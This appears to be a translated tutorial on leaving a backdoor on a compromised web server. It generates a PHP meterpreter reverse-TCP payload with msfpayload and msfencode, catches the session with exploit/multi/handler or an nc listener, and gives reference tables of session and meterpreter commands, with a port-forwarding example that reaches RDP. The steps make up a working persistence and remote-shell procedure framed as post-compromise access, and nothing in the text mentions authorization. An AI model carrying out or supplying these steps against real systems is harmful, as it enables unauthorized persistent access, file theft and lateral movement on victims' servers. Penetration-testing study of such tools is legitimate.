msfpayload reverse shell


1. Preparation

The scenario: we have obtained a webshell and want to leave a backdoor behind. For that we can combine msfpayload (to build the payload) with msfconsole (to catch the session).

Start the PostgreSQL service: service postgresql start

Start the Metasploit service: service metasploit start

Start msfconsole: msfconsole

Check the database connection status: db_status

Generate the backdoor file

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/Desktop/exp.php

LHOST and LPORT are the attacker's address and port; the payload connects back to them, so they must match the listener started below. The php/base64 encoder emits a bare eval(base64_decode(...)) statement, so exp.php has to be wrapped in <?php  ?> tags by hand, otherwise the web server serves it as plain text instead of executing it.

Note that msfpayload and msfencode were removed from Metasploit in 2015; on current versions the same step is done with msfvenom, where -p selects the payload, -e the encoder, -f the output format and -o the output file.

Start the listener on the attacking side

In msfconsole, use exploit/multi/handler with the same payload, LHOST and LPORT as the backdoor. A staged payload such as php/meterpreter/reverse_tcp only works with this handler, because the meterpreter stage has to be sent back over the connection.

Or, for a non-staged payload such as php/reverse_php, with nc:

nc 192.168.133.128 -lvp 5555

Then request the backdoor file on the web server and the session calls back to the listener.

2. How do we keep hold of the sessions we get? First, msfconsole must be connected to the database (check with db_status); that is where the hosts, services and loot gathered from a session are stored between runs. The sessions themselves only live inside the running msfconsole, so run the handler as a job (-j) without auto-interacting (-z) and manage them with the sessions command. The relevant options:

exploit -h
    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.  (payload encoder; defaults to the ENCODER setting)
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.  (runs in the background as a job)
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index to use.  If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation  (leaves the new session in the background)
sessions -h
    -K        Terminate all sessions  (kills every session)
    -c <opt>  Run a command on the session given with -i, or all  (runs a single command)
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID   (attaches to a session)
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List verbose fields


3. Using meterpreter

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session  (keeps the session alive in the background; return to it with sessions -i)
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode  (interactive Ruby shell inside the session)
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    portfwd       Forward a local port to a remote service  (port forwarding through the session)

    portfwd add -l 5555 -p 3389 -r 192.168.198.129    binds local port 5555 and forwards it through the meterpreter session to port 3389 (RDP) on 192.168.198.129, so the attacker connects to 127.0.0.1:5555 to reach it


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS

See also: 初探meterpreter (A first look at meterpreter)

